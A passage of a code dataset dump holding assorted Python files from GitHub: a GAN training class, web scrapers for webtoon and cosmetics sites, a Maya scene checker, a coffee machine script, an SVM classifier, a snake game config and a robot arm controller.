torch.load(opt.pretrained_aux_path)\n\n self.crit_aux_B = utils.get_criterion(\n opt.aux_loss_type, \n opt.gen_aux_loss_weight,\n self.enc)\n\n print('')\n print(self.aux)\n print('')\n\n # In case domains have different sizes, this 
is needed for mse loss\n scale_factor = opt.img_size_B // opt.img_size_A\n\n self.down = nn.AvgPool2d(scale_factor)\n self.up = nn.Upsample(\n scale_factor=scale_factor, \n mode='bilinear',\n align_corners=False)\n\n # Load onto GPUs\n self.gen_B = nn.DataParallel(self.gen_B.cuda(self.gpu_id), opt.gpu_ids)\n self.dis_B = nn.DataParallel(self.dis_B.cuda(self.gpu_id), opt.gpu_ids)\n if hasattr(self, 'aux'):\n self.aux = nn.DataParallel(self.aux.cuda(self.gpu_id), opt.gpu_ids)\n if self.enc is not None: \n self.enc = nn.DataParallel(self.enc.cuda(self.gpu_id), opt.gpu_ids)\n\n def forward(self, inputs):\n\n if len(inputs) == 4:\n real_A, real_A_aux, _, real_B_aux = inputs\n\n # Input images\n self.real_A = Variable(real_A.cuda(self.gpu_id))\n\n self.real_A_aux = Variable(real_A_aux.cuda(self.gpu_id))\n self.real_B_aux = Variable(real_B_aux.cuda(self.gpu_id))\n\n # Fake images \n self.fake_B = self.gen_B(self.real_A, self.real_B_aux)\n\n def backward_G(self):\n\n # Cycle loss\n cycle_A = self.gen_B(self.down(self.fake_B), self.real_A_aux)\n\n self.loss_cycle_A = self.crit_mse_A(cycle_A, self.real_A)\n\n # MSE loss\n loss_mse_A = self.loss_cycle_A\n\n # GAN loss\n loss_dis_B, _, _ = self.crit_dis_B(\n img_real_dst=self.fake_B,\n aux_real_dst=self.real_B_aux,\n enc=self.enc)\n\n loss_G = loss_mse_A + loss_dis_B\n\n if hasattr(self, 'crit_aux_B'):\n fake_B_aux = self.aux(self.fake_B)\n self.loss_auxil_B = self.crit_aux_B(fake_B_aux, self.real_B_aux)\n loss_G += self.loss_auxil_B\n\n if self.training:\n loss_G.backward()\n\n # Get values for visualization\n self.loss_cycle_A = self.loss_cycle_A.data.item()\n\n # Get values for visualization\n if hasattr(self, 'crit_aux_B'):\n self.loss_auxil_B = self.loss_auxil_B.data.item()\n\n def backward_D(self):\n\n loss_dis_B, self.losses_adv_B, losses_aux_B = self.crit_dis_B(\n img_real_dst=self.real_A, \n img_fake_dst=self.fake_B.detach(),\n aux_real_dst=self.real_A_aux,\n enc=self.enc)\n\n if losses_aux_B: self.losses_aux_B = losses_aux_B\n\n loss_D = loss_dis_B\n\n if self.training:\n loss_D.backward()\n\n def train(self, mode=True):\n\n self.training = mode\n \n self.gen_B.train(mode)\n self.dis_B.train(mode)\n self.crit_dis_B.train(mode)\n\n return self","repo_name":"new-okaerinasai/ecal_5d","sub_path":"models/stargan.py","file_name":"stargan.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18257228996","text":"# -*- coding:utf-8 -*-\n\n#pip install requests\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\n\n\nurl='https://comic.naver.com/webtoon/weekdayList.nhn?week=thu'\nresp = requests.get(url)\n\n\n#print(resp.text) # --res.text is a string object \nsoup = BeautifulSoup(resp.text, 'html.parser')\n#print(soup) #-- each tag (e.g. </script>) becomes an object, so I can slice out just the parts I want.\n\n#title[star rating]\n\n\nimg_list = soup.find('ul',class_='img_list')\n\nwebtoons = img_list.select('dl')\n\nlst = list()\nfor webtoon in webtoons:\n title = webtoon.find('a')['title']\n star = webtoon.find('strong').text\n print('{} [{}]'.format(title, star))\n tmp = {} #dic #{} is a set or dictionary\n tmp['title'] = title\n tmp['star'] = star\n lst.append(tmp)\n \n\n#print(lst)\nres = {}\nres['webtoons'] = lst\nres_json = json.dumps(res, ensure_ascii=False) #Hangul (Korean) encoding \nprint(res_json)\n\nwith open('webtoons.json','w',encoding='utf-8') as f: #save to a file\n f.write(res_json) 
\n\n","repo_name":"moonhyeji/Python","sub_path":"Python02/crawling/naver/webtoon.py","file_name":"webtoon.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3655126150","text":"#SECTION TO CHECK THE OBJECT IN THE SCENE\r\n\r\nimport maya.cmds as cmds\r\n\r\n#GLOBAL VARIABLE TO CONTAIN THE FINAL CORRECT LIST\r\nObjListShape=[]\r\nLogList=[]\r\nUVList=[]\r\n\r\n#FUNCTIONS\r\n#THIS ONE TO SUBTRACT ELEMENT FROM A LIST IF THEY ARE INSIDE THE LIST, INPUT ARE 2 LISTS\r\ndef RemoveFromList(startinglist,subtractlist):\r\n for element in subtractlist:\r\n if element in startinglist:\r\n startinglist.remove(element)\r\n return startinglist\r\n\r\n'''-------------------------------------------------------------------------------------------------------------'''\r\n\r\n#HERE WE NEED TO CHECK ALL THE ELEMENTS INSIDE THE SCENE\r\n#OBJ TO AVOID >> GROUPS, CAMERAS [_GRP IS THE STANDARD FOR GROUPS NAME]\r\n\r\ndef InDaScene():\r\n\r\n #1 OBTAIN ALL THE OBJECT IN THE SCENE\r\n cmds.select(allDagObjects=True)\r\n list_scene=cmds.ls(orderedSelection=True)\r\n\r\n #3 OBTAIN A LIST OF GROUPS\r\n suffix='_GRP'\r\n list_groups=[]\r\n\r\n for element in list_scene:\r\n if suffix in element:\r\n list_groups.append(element)\r\n\r\n #JUST SUBTRACTING THE TWO LIST WITH THE FUNCTION CREATED ABOVE\r\n ObjListShape.extend(RemoveFromList(list_scene,list_groups))\r\n\r\n #IF EMPTY >> I ADD THE VALUE TO THE LOGLIST \r\n #ELSE WE WILL CREATE A SEPARATE LIST FOR OBJ AND UVSET THAT WE WILL USE INTO ANOTHER FUNCTION >> THE ONE THAT WILL CORRECT THE UVS IF WRONG\r\n if ObjListShape==[]:\r\n LogList.append('empty') \r\n else:\r\n for obj in ObjListShape:\r\n cmds.select(obj,add=True)\r\n UVList.append(cmds.polyUVSet(obj,query=True,allUVSets=True))\r\n\r\n return ObjListShape,LogList,UVList\r\n\r\n#HERE WE EXCUTE THE FUNCTION TO GAVE THE RESULT TO ANOTHER MODULE\r\n#InDaScene()","repo_name":"MariaGiuliaButto/Checker","sub_path":"Checker/Custom_Functions/SceneDetection.py","file_name":"SceneDetection.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"105154597","text":"def calcDist(lat1,long1,lat2,long2):\n import math\n delta_lat = abs(math.radians(lat1)-math.radians(lat2))\n mean_lat = 0.5*(math.radians(lat1)+math.radians(lat2))\n delta_long = abs(math.radians(long1)-math.radians(long2))\n R = 3958.761 # radius of the Earth in statute miles\n D_sq = (R**2)*(delta_lat**2+(math.cos(mean_lat)*delta_long)**2)\n return D_sq\n\n\ndef filterResults(latitude,longitude,query_results):\n from operator import itemgetter\n uniquelocations = []\n distarray = []\n for i,entry in enumerate(query_results):\n loc_latlong = [float(entry[1]),float(entry[2])]\n # This is bad hack to get rid of duplicates by just throwing out any additional titles at that location.\n if loc_latlong not in uniquelocations:\n uniquelocations.append(loc_latlong)\n location_identifier = uniquelocations.index(loc_latlong)\n dsq = calcDist(latitude,longitude,float(entry[1]),float(entry[2]))\n notes = formatNotes(entry[3])\n distarray.append([entry[0],entry[1],entry[2],notes,entry[4],entry[5],location_identifier,dsq])\n \n distarray_sorted = sorted(distarray,key=itemgetter(7))\n \n return_array = []\n iterator = 0\n returned_locations = 0\n while len(return_array)<=10 and iterator<len(query_results):\n entry = distarray_sorted[iterator]\n 
return_array.append([entry[0],entry[1],entry[2],entry[3],entry[4],entry[5]])\n iterator = iterator+1\n \n #print distarray_sorted\n return return_array\n \ndef formatNotes(notes):\n notes = notes.strip(' ')\n notes = notes.strip('(')\n notes = notes.strip(')')\n firstletter = notes[0].upper()\n newnotes = firstletter+notes[1:]+'.'\n return newnotes\n\ndef searchNearby(db,latitude,longitude,lrange):\n # Select statement is very long. Break into pieces for readability\n select_statement = 'SELECT title,latitude,longitude,notes,image_url,address FROM locations_with_description WHERE '\n where_statement1 = 'latitude > %f AND latitude < %f' % (latitude-lrange,latitude+lrange)\n where_statement2 = ' AND longitude > %f AND longitude < %f' % (longitude-lrange,longitude+lrange)\n notes_statement = ' AND notes IS NOT NULL;'\n thisquery = select_statement+where_statement1+where_statement2+notes_statement\n db.query(thisquery)\n query_results = db.store_result().fetch_row(maxrows=0)\n return query_results","repo_name":"PhysB/Insight","sub_path":"app_helperfunctions.py","file_name":"app_helperfunctions.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"12673827278","text":"import numpy as np\n\na_d = 8\nv_c = -4\ntimestamp = np.arange(0,2,0.01)\n\nv_d = lambda time : a_d*time\ndel_sd = lambda time : a_d/2 * pow(time,2)\ndel_sa = lambda del_sd: del_sd/-2\n\nv_a = lambda time : a_d/-2*time\n# v_b = lambda time : v_c/2\nv_arb = lambda v_a,v_b : v_a - v_b\n\n# theta = 150\n# v_radian = r_d(theta_d,theta)\n# v_theta = r(theta) * theta_d\n# print (v_radian)\n# print (v_theta)\n\n\nvd_stamp = [ v_d(t) for t in timestamp]\ndel_sd = [ del_sd(t) for t in timestamp ]\ndel_sa = [ del_sa(sd) for sd in del_sd ]\n\nv_a = [ v_a(t) for t in timestamp]\n# v_b = [ v_b(t) for t in timestamp]\nv_b = v_c/2\nv_arb = [ v_arb(a,v_b) for a in v_a]\n\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Bar, Grid, Line\n\nposition = (\n Line()\n .add_xaxis(xaxis_data=timestamp)\n .add_yaxis(\n series_name=\"displacement_D\",\n y_axis=del_sd,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False),\n )\n .add_yaxis(\n series_name=\"displacement_A\",\n y_axis=del_sa,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False),\n )\n # International System of Units (SI) mm\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"Pulley System\", subtitle=\"accerlation d = %s m/s2 \" %(a_d) ),\n tooltip_opts=opts.TooltipOpts(trigger=\"axis\", axis_pointer_type=\"cross\"),\n yaxis_opts=opts.AxisOpts(\n type_=\"value\",\n axistick_opts=opts.AxisTickOpts(is_show=True),\n splitline_opts=opts.SplitLineOpts(is_show=True),\n ),\n xaxis_opts=opts.AxisOpts(type_=\"category\", boundary_gap=True),\n )\n \n)\n\nspped = (\n Line()\n .add_xaxis(xaxis_data=timestamp)\n .add_yaxis(\n series_name=\"velocity_A\",\n y_axis=v_a,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False),)\n\n .add_yaxis(\n series_name=\"velocity_A/B\",\n y_axis=v_arb,\n areastyle_opts=opts.AreaStyleOpts(opacity=0.5),\n label_opts=opts.LabelOpts(is_show=False))\n\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"Relative speed\", subtitle=\"v_c = %s m/s \"%(v_c),\n pos_bottom=\"48%\"),\n tooltip_opts=opts.TooltipOpts(trigger=\"axis\", axis_pointer_type=\"cross\"),\n legend_opts=opts.LegendOpts(pos_bottom=\"48%\"),\n 
xaxis_opts=opts.AxisOpts(type_=\"category\", boundary_gap=False,\n # min_=0,\n # max_=200,\n # # interval=1,\n # axislabel_opts=opts.LabelOpts(formatter=\"{value} s\"),\n # axistick_opts=opts.AxisTickOpts(is_show=True),\n # splitline_opts=opts.SplitLineOpts(is_show=True),\n ),\n\n\n )\n)\n\n\n\n\ngrid = (\n Grid()\n .add(position, grid_opts=opts.GridOpts(pos_bottom=\"60%\"))\n .add(spped, grid_opts=opts.GridOpts(pos_top=\"60%\"))\n .render(\"pulley_ad%s_vc%s.html\" %(a_d,v_c) ) \n)","repo_name":"jinsanity07git/UWMnotebook","sub_path":"docs/CE202/lab/numerical/inlab5.py","file_name":"inlab5.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25403418301","text":"# currency\nQUARTERS = 0.25\nDIMES = 0.10\nNICKLES = 0.05\nPennies = 0.01\n\nMENU = {\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24\n },\n \"price\": 2.50,\n\n },\n 'espresso': {\n \"ingredients\": {\n \"water\": 50,\n \"coffee\": 18},\n \"price\": 1.50,\n\n }\n ,\n 'cappuccino': {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24},\n \"price\": 2.50}\n}\nprofit = 0\n\nresources = {\n \"coffee\": 100,\n \"water\": 300,\n \"milk\": 200\n}\n\n\ndef is_resource_sufficient(order_ingredients):\n \"\"\"Returns True when order can made, False if ingredients are insufficient\"\"\"\n for item in order_ingredients:\n if order_ingredients[item] >= resources[item]:\n print(\"Sorry there is not enough water.\")\n return False\n return True\n\n\ndef process_coins():\n print(\"Please insert coin.\")\n total = int(input(\"how many quarters?: \")) * 0.25\n total += int(input(\"how many dimes?: \")) * 0.1\n total += int(input(\"how many nickles?: \")) * 0.05\n total += int(input(\"how many pennies?: \")) * 0.01\n print(total)\n return total\n\n\ndef is_transaction_successful(money_received, drink_cost):\n \"\"\"Return True when payment is accepted, or False if money is insufficient\"\"\"\n if money_received >= drink_cost:\n change = round(money_received - drink_cost, 2)\n print(f\"Here's is ${change} in change.\")\n global profit\n profit += drink_cost\n return True\n else:\n print(\"Sorry that's not enough money. Money refunded.\")\n return False\n\n\ndef make_coffee(drink_name, order_ingredients):\n \"\"\"Deduct the required ingredients from the resources.\"\"\"\n for item in order_ingredients:\n resources[item] -= order_ingredients[item]\n print(f\"Here is your {drink_name}☕. Enjoy!\")\n\n\nis_on = True\nwhile is_on:\n choice = input(\"What would you like? 
(espresso, latte, cappuccino): \")\n if choice == 'off':\n is_on = False\n elif choice == 'report':\n print(f\"Coffee {resources['coffee']}g.\")\n print(f\"Water {resources['water']}ml.\")\n print(f\"Milk {resources['milk']}ml.\")\n print(f\"Money ${profit}.\")\n else:\n drink = MENU[choice]\n if is_resource_sufficient(drink[\"ingredients\"]):\n payment = process_coins()\n if is_transaction_successful(payment, drink[\"price\"]):\n make_coffee(choice, drink[\"ingredients\"])\n\n # flavours\n\n # if choice == 'latte':\n # choose = 'LATTE'\n # num = 'LATTE'\n #\n # elif choice == 'espresso':\n # choose = MENU[0]['NAME']\n # num = 'ESPRESSO'\n #\n # elif choice == 'pennies':\n # choose = Pennies\n # num = 'CAPPUCCINO'\n #\n # if choice == 'off':\n # turn_on = False\n\n #\n # def coffee_machine(Water=MENU[num]['WATER'], Milk=MENU[num]['Milk'], Coffee=MENU[num]['NAME'], MONEY=MONEY):\n #\n #\n #\n # print(\"Please insert coins.\")\n # quarters = int(input(\"How many quarters?: \"))\n # dimes = int(input(\"How many dimes?: \"))\n # nickles = int(input(\"How many nickles?: \"))\n # pennies = int(input(\"How many pennies?: \"))\n # total_money = ((QUARTERS * quarters) + (DIMES * dimes) + (nickles * NICKLES) + (Pennies * pennies))\n #\n # Water -= MENU[num]['WATER']\n # if WATER < MENU[num]['WATER']:\n # print(\"Sorry their is not enough water.\")\n #\n # elif total_money < MENU[num]['PRICE']:\n # MONEY -= total_money\n # print(\"Sorry that's not enough money. Money refunded\")\n # elif total_money > MENU[num]['PRICE']:\n # MONEY += MENU[num]['PRICE']\n # print(f\"Here is ${total_money - MENU[num]['PRICE']} in change.\")\n # print(f\"Here is your little {choice} enjoy!\")\n #\n #\n # coffee_machine()\n","repo_name":"code-sharad/Python_p","sub_path":"coffe_machine/coffe_machine.py","file_name":"coffe_machine.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40384154808","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\nfrom pandas import DataFrame as df\nimport pandas as pd\n\ndef scrape_products():\n\tproduct_dict = {}\n\t\n\tpage = requests.get(\"https://www.sephora.com/shop/foundation-makeup\")\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\n\t# find all products on the foundations page\n\tproducts = soup.find_all('a', {'class': 'css-ix8km1'})\n\n\t# store found titles and link in the lists AND IMAGES\n\tproduct_links = []\n\tproduct_titles = []\n\n\tfor i in products:\n\t\ttitle = i.get('aria-label') # titles of the foundation product\n\t\thref = i.get('href') # link to the foundation product\n\t\t\n\t\tproduct_dict[title] = href\n\t\t\n\t\tproduct_links.append(hrefs)\n\t\tproduct_titles.append(title)\n\t\n\ndef scrape_swatches(link):\n\tswatch_titles = []\n\tswatch_links = []\n\tswatch_dict = {}\n\n# find swatched for selected product\n\tpage = requests.get('https://www.sephora.com' + link)\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\tswatches = soup.find_all('button', {'data-at': 'selected_swatch'}) # find all shades of foundation \n# \tswatch_imgs = soup.find_all('img') #find all images of the shades of foundations \n\t\n\tfor swatch in swatches:\n\t\tswatch_name = swatch.get('aria-label') # name of the shade\n\t\tswatch_imgs = soup.find_all('img') #find all images of the shades of foundations \n\t\t\n\t\tfor img in swatch_imgs:\n\t\t\tswatch_img = img.get('src')\n\t\t\tif swatch_img.startswith('/productimages/sku/') and 
swatch_img.endswith('+sw.jpg'):\n\t\t\t# 'www.sephora/...' + swatch_link\n\t\t\t#swatch_links.append(swatch_img)\n\t\t\t#print(swatch_img)\n\t\t\t\tswatch_dict[swatch_name] = swatch_img\n\tprint(swatch_dict)\n\t\n\n\n\t\nscrape_products()\nscrape_swatches('/product/pro-filtr-soft-matte-longwear-foundation-P87985432?icid2=products%20grid:p87985432')","repo_name":"alina-g/foundation-match","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"24188727414","text":"from . import tools\nimport os, sys\n\n# Window size\nScreenWidth, ScreenHeight = 800, 600\nScreenSize = ScreenWidth, ScreenHeight\n\n# Absolute path\n# bathPath = 'D:/Code/Python/WorkSpace/Snack_1.0.1/'\n# Relative path\nbathPath = ''\ndef resource_path(relative_path):\n if getattr(sys, 'frozen', False): #whether running as a Bundle Resource\n base_path = sys._MEIPASS\n else:\n base_path = os.path.abspath(\".\")\n return os.path.join(base_path, relative_path)\n# Font\n# FONT ='SimHei'\nFONT = '隶书,dengxian,SimHei'\n# FONT = 'script' cursive style, English only\n# FONT = 'dengxian'\n#\n\n# Colors - picked from: https://wenku.baidu.com/view/823dca44b307e87101f6961b.html\nwhiltColor = (255, 255, 255)\nblackColor = (0, 0, 0)\npinkColor = (255, 192, 203)\npurpleColor = (96, 135, 176)\nblueColor = (0, 191, 255)\ngreenColor = (0, 250, 154)\ngreenColorDark = (107, 142, 35)\nyelloColor = (255, 255, 0)\ngoldColor = (255, 215, 0)\nbrownColor = (184, 134, 11)\norangeColor = (255, 165, 0)\nredColor = (255, 0, 0)\nredColorDark = (178, 34, 34)\n\n# Game speed, Normal == 10\nSpeed = [300, 200, 100, 50]\n\n# Cursor\nCursorSize = 30, 30\nCursorPosition = [[170, 200], [170, 300], [170, 400], [170, 500]]\n\n# info\nMainInfo = ['开始游戏', '难度选择', '边界判定', '游戏模式']\nMainInfoPosition = [(220, 190),(220, 290),(220, 390),(220, 490)]\nModeInfo = [[''], ['Easy', 'Normal', 'Hard', 'Impossible'], ['Die', 'Cross'], ['Single', 'Double', 'Auto', 'Man Vs AI']]\nModeInfoPosition = [(520, 205),(520, 305),(520, 405),(520, 505)]\n\n# Mode selection state\nmode = [0, 1, 0, 0]\ndef updateMode(newMode):\n global mode\n mode = newMode\nlevel = 1\n\n# Game score\nscore = 0\ndef addScore(value):\n global score\n score += value\n\nscoreP1 = 0\ndef addScoreP1(value):\n global scoreP1\n scoreP1 += value\n\nscoreP2 = 0\ndef addScoreP2(value):\n global scoreP2\n scoreP2 += value\n\n# Snake length\nlenthP1 = 3\ndef updateP1(lenth):\n global lenthP1\n lenthP1 = lenth\n\nlenthP2 = 3\ndef updateP2(lenth):\n global lenthP2\n lenthP2 = lenth\n\n# Elapsed time\n\ntimer = 0\ndef updateTimer(value):\n global timer\n timer = value\n","repo_name":"Withinlover/Retro-Snaker-via-pygame","sub_path":"source/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71135315192","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n\n def _brute_force():\n # time limit exceeded\n if s == '':\n return 0\n\n substring_dict = {}\n\n for i in range(len(s)):\n for j in range(1, len(s)):\n if len(s[i:j]) >= 1:\n if s[j] in s[i:j]:\n break\n\n substring_dict[s[i:j+1]] = len(s[i:j+1])\n\n if not bool(substring_dict):\n return 1\n\n return max(substring_dict.values())\n\n substring_dict = {}\n\n if len(s) > 0:\n substring_dict[s[0]] = 1\n elif len(s) == 0:\n return 0\n\n start_i, end_i = 0, 1\n while end_i < len(s):\n\n if s[end_i] in s[start_i:end_i]:\n start_i = s[start_i:end_i].index(s[end_i]) + start_i + 1\n end_i += 1\n continue\n 
else:\n end_i += 1\n\n substring_dict[s[start_i:end_i]] = len(s[start_i: end_i])\n\n return max(substring_dict.values())\n\n\nif __name__ == '__main__':\n solution = Solution()\n\n result = solution.lengthOfLongestSubstring(\"bbtablud\")\n print(result)","repo_name":"atozto9/algorithm","sub_path":"leetcode/top-100/003-longest_substring_without_repeating_characters.py","file_name":"003-longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41231300373","text":"import numpy as np\n\n\n\nclass SVM():\n def __init__(self):\n \"\"\"\n Initialises Softmax classifier with initializing\n weights, alpha(learning rate), number of epochs\n and regularization constant.\n \"\"\"\n self.w = None\n self.alpha = 0.01\n self.epochs = 300\n self.reg_const = 0.04\n\n def calc_gradient(self, X_train, y_train):\n \"\"\"\n Calculate gradient of the svm hinge loss.\n\n Inputs have dimension D, there are C classes, and we operate on minibatches\n of N examples.\n\n Inputs:\n - X_train: A numpy array of shape (N, D) containing a minibatch of data.\n - y_train: A numpy array of shape (N,) containing training labels; y[i] = c means\n that X[i] has label c, where 0 <= c < C.\n\n Returns:\n - gradient with respect to weights W; an array of same shape as W\n \"\"\"\n\n\n\n '''for i in range(len(X_train)):\n\n for classes in set(y_train):\n if classes != y_train[i]:\n calculation=self.w[j].T.dot(X_train[i])-self.w[class_i].T.dot(X_train[i])\n if calculation<1.0:\n self.w[j]=self.w[j]-self.alpha*X_train[i]\n self.w[y_train[i]]=self.w[y_train[i]]+self.alpha*X_train[i]\n\n\n self.w=self.w*(1/X_train.shape[0])*self.reg_const'''\n\n '''#vectorized implementation'''\n\n '''calculating the dot product of w and X_train'''\n #loss_function=X_train.dot(self.w.T)\n\n #number=range(0,X_train.shape[0])\n #number=np.array(number)\n #right_class=loss_function[number,y_train]+1\n\n '''#after getting right class loss value i will subtract from loss function and replace negative value with zero according to formula'''\n #loss_function=loss_function-np.matrix(right_class).T\n #loss_function[loss_function<0]=0\n\n #loss_function[loss_function>0]=1\n\n '''#subtracting total no of ones from the '''\n #loss_function[number,y_train]=loss_function[number,y_train]-loss_function.sum(axis=1).T\n '''#multiplying loss function with X_train'''\n #gradient=(self.alpha*X_train).T*loss_function\n #self.w=(gradient.T*self.reg_const)/X_train.shape[0]\n\n for i in range(len(X_train)):\n value=X_train[i].dot(self.w.transpose())\n class_v=np.argmax(value)\n if class_v != y_train[i] :\n self.w[class_v]=self.w[class_v]-(self.alpha*X_train[i])\n self.w[y_train[i]]=self.w[y_train[i]]+(self.alpha*X_train[i])\n\n self.w=self.w-self.w*((self.alpha*self.reg_const)/len(X_train))\n\n\n return self.w\n\n def train(self, X_train, y_train):\n \"\"\"\n Train SVM classifier using stochastic gradient descent.\n\n Inputs:\n - X_train: A numpy array of shape (N, D) containing training data;\n N examples with D dimensions\n - y_train: A numpy array of shape (N,) containing training labels;\n\n Hint : Operate with Minibatches of the data for SGD\n \"\"\"\n nrows=len(set(y_train))\n ncols=X_train.shape[1]\n self.w=np.random.random((nrows,ncols))\n batch_size_list=[]\n batchsize=100\n batch_size_list=[[X_train[size:size+batchsize],y_train[size:size+batchsize]]for size in range(0,len(X_train),batchsize)]\n\n\n for i in 
range(self.epochs):\n for batches in batch_size_list:\n grad_w=self.calc_gradient(batches[0],batches[1])\n\n def predict(self, X_test):\n \"\"\"\n Use the trained weights of svm classifier to predict labels for\n data points.\n\n Inputs:\n - X_test: A numpy array of shape (N, D) containing training data; there are N\n training samples each of dimension D.\n\n Returns:\n - pred: Predicted labels for the data in X_test. pred is a 1-dimensional\n array of length N, and each element is an integer giving the predicted\n class.\n \"\"\"\n pred=[]\n for i in range(len(X_test)):\n value=X_test[i].dot(self.w.transpose())\n class_v=np.argmax(value)\n pred.append(class_v)\n\n return pred\n","repo_name":"kkotha4/Machine-Learning","sub_path":"models/SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"30796467491","text":"import numpy as np\nfrom numpy import sin\nfrom numpy import cos\n\nclass Solution:\n\n def __init__(self):\n self.time_previous = 0\n\n def calculate_jacobian(self, angles):\n q1 = angles[0]\n q2 = angles[1]\n q3 = angles[2]\n q4 = angles[3]\n jacobian = np.array([[3*cos(q1)*cos(q3)*sin(q2)-3*sin(q1)*sin(q3)+2*cos(q4)(cos(q1)*cos(q3)*sin(q2)-sin(q1)*sin(q3))+2*cos(q1)*cos(q2)*sin(q4),\n 3*cos(q2)*cos(q3)*sin(q1)+2*cos(q2)*cos(q3)*cos(q4)*sin(q1)-2*sin(q1)*sin(q2)*sin(q4),\n 3*cos(q1)*cos(q3)-3*sin(q1)*sin(q2)*sin(q3)+2*cos(q4)(cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3)),\n 2*cos(q2)*cos(q4)*sin(q1)-2(cos(q3)*sin(q1)*sin(q2)+cos(q1)*sin(q3))*sin(q4)],\n [3*cos(q3)*sin(q1)*sin(q2)+3*cos(q1)*sin(q3)+2*cos(q4)(cos(q3)*sin(q1)*sin(q2)+cos(q1)*sin(q3))+2*cos(q2)*sin(q1)*sin(q4),\n -3*cos(q1)*cos(q2)*cos(q3)-2*cos(q1)*cos(q2)*cos(q3)*cos(q4)+2*cos(q1)*sin(q2)*sin(q4),\n 3*cos(q3)*sin(q1)+3*cos(q1)*sin(q2)*sin(q3)+2*cos(q4)(cos(q3)*sin(q1)+cos(q1)*sin(q2)*sin(q3)),\n -2*cos(q1)*cos(q2)*cos(q4)-2(-cos(q1)*cos(q3)*sin(q2)+sin(q1)*sin(q3))*sin(q4)],\n [0,\n -3*cos(q3)*sin(q2)-2*cos(q3)*cos(q4)*sin(q2)-2*cos(q2)*sin(q4),\n -3*cos(q2)*sin(q3)-2*cos(q2)*cos(q4)*sin(q3),\n -2*cos(q4)*sin(q2)-2*cos(q2)*cos(q3)*sin(q4)]])\n return jacobian\n\n def control_closed(self, angles):\n \"\"\"Finds\n\n :param angles: list of joints(initial) [q1, q2, q3, q4]\n :return joints angles [q1, q2, q3, q4]\n \"\"\"\n # P gains\n K_p = np.array([[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1]])\n # D gains\n K_d = np.array([[0.1, 0, 0],\n [0, 0.1, 0],\n [0, 0, 0.1]])\n\n cur_time = rospy.get_time()\n dt = cur_time - self.time_previous\n self.time_previous = cur_time\n # robot end-effector position\n pos_end = self.target_coordinates(red, yellow, blue)\n # target position\n pos_target = self.target_coordinates(target, yellow, blue)\n # estimate derivative of error\n self.error_d = ((pos_target - pos_end) - self.error)/dt\n # estimate error\n self.error = pos_target - pos_end\n\n J_inv = np.linalg.pinv(self.calculate_jacobian(angles)) # calculate the psudeo inverse of Jacobian\n # angular velocity of joints\n dq_d = np.dot(J_inv, (np.dot(K_d, self.error_d.T) + np.dot(K_p, self.error.T)))\n # angular position of joints\n q_d = angles + (dt * dq_d)\n return q_d\n\n\n","repo_name":"gong7788/ivr_assignment","sub_path":"src/close_loop.py","file_name":"close_loop.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36237342197","text":"\"\"\"Serialization of projects for display purposes\"\"\"\n\nfrom pathlib 
import Path\nfrom typing import Tuple, Optional\n\nfrom rich.console import Console\nfrom rich.markdown import Markdown\nfrom rich.table import Table\n\nfrom ... import Repository\nfrom ....project import load_project\nfrom ....projects import ProjectWithDependents\nfrom ....projects.find import load_projects, find_dependencies\n\n\ndef print_project(repo: Repository, console: Console, project_path: str):\n project = load_project(repo.root_dir, Path(project_path), False)\n other_projects = load_projects(repo.root_dir, repo.find_projects())\n\n with_dependencies = find_dependencies(project, other_projects)\n\n table, readme = project_to_markdown(with_dependencies)\n console.print(table, readme)\n\n\ndef project_to_markdown(\n with_dependencies: ProjectWithDependents,\n) -> Tuple[Table, Optional[Markdown]]:\n project = with_dependencies.project\n table = Table(title=f\"Project {project.name}\", show_header=False)\n table.add_row(\"Name\", project.name)\n table.add_row(\"Path\", project.path)\n table.add_row(\"Description\", project.description)\n table.add_row(\"Maintainer\", f\"{project.maintainer}\")\n table.add_row(\"Stages\", f\"{project.stages}\")\n if with_dependencies.dependent_projects:\n 